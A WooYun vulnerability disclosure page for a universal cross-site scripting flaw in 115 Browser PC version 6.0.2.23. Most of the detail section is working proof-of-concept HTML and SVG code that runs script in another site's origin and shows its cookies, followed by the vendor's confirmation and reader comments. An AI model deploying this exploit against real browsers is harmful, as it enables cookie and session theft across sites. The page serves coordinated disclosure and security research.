当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0175605

漏洞标题:115浏览器PC版UXSS漏洞指哪打哪

相关厂商:115网盘

漏洞作者: phith0n

提交时间:2016-02-13 10:04

修复时间:2016-05-13 10:50

公开时间:2016-05-13 10:50

漏洞类型:非授权访问/认证绕过

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-02-13: 细节已通知厂商并且等待厂商处理中
2016-02-13: 厂商已经确认,细节仅向厂商公开
2016-02-16: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-04-08: 细节向核心白帽子及相关领域专家公开
2016-04-18: 细节向普通白帽子公开
2016-04-28: 细节向实习白帽子公开
2016-05-13: 细节向公众公开

简要描述:

UXSS漏洞非跨域漏洞,可以在wooyun.org直接打baidu.com的Cookie,在目标域执行任意代码。
版本:6.0.2.23

详细说明:

最新版:

QQ20160212-0@2x.png


利用代码:
1.html

<body><iframe></iframe><table><b><p><iframe></iframe><script>
frames[1].onunload = function() {
document.body.removeChild(document.querySelector('table'));
}
onunload = function() {
// Clean up to fix some crashes during reload.
while (document.childNodes.length) {
document.removeChild(document.childNodes[0]);
}
}
onload = function() {
try{ frames[0].a }catch(e){ location.reload() };
xof = frames[0].frameElement;
xof.onload = function() {
xof.onload = null;
xof.src = 'javascript:alert(document.cookie)';
var xmlErr = document.documentElement.appendChild(document.createElement('iframe'));
xmlErr.src = '1.svg';
}
xof.src = 'http://**.**.**.**/';
}
</script></b></p></table></body>


1.svg

<svg xmlns="http://**.**.**.**/2000/svg">
<script>
document.documentElement.appendChild(document.createElementNS('http://**.**.**.**/1999/xhtml', 'iframe'));
var b = top.xof.parentNode;
if (t = b.childNodes[1]) {
// It appears that something is holding the table element alive
// because the node destructor didn't run and its siblings' refs
// to it weren't cleared, so it's still reachable during node
// traversals. That'd crash when insertedInto notifications try to
// use the node's parentOrShadowHostNode(), so make sure it has
// a parent, and use a spare document to avoid traversal loops.
top.frames[1].document.body.appendChild(t);
}
frames[0].onunload = function() {
document.documentElement.appendChild(b);
b.insertBefore(document.createElement('x'), top.xof);
}
</script>
<element a="1" a="2" />
</svg>


访问1.html即可执行在http://**.**.**.**/ 下执行 javascript:alert(document.cookie)

漏洞证明:

http://mhz.pw/game/chrome/1.html

QQ20160212-1@2x.png

修复方案:

版权声明:转载请注明来源 phith0n@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-02-13 10:40

厂商回复:

确认问题存在,感谢对115浏览器的支持!

最新状态:

暂无


漏洞评价:

评价

  1. 2016-02-13 10:21 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)

    指哪打哪

  2. 2016-02-13 16:50 | By遗忘 ( 实习白帽子 | Rank:44 漏洞数:7 | 网络爱好者)

    指哪打哪

  3. 2016-02-14 19:08 | 404notfound ( 普通白帽子 | Rank:417 漏洞数:115 | 考研中,有事请留言)

    师傅无敌

  4. 2016-02-17 20:11 | Mengter ( 路人 | Rank:6 漏洞数:2 | 太难了.)

    火钳

  5. 2016-02-23 13:56 | do9gy ( 实习白帽子 | Rank:78 漏洞数:17 | Dog loves God。)

    师父让我看看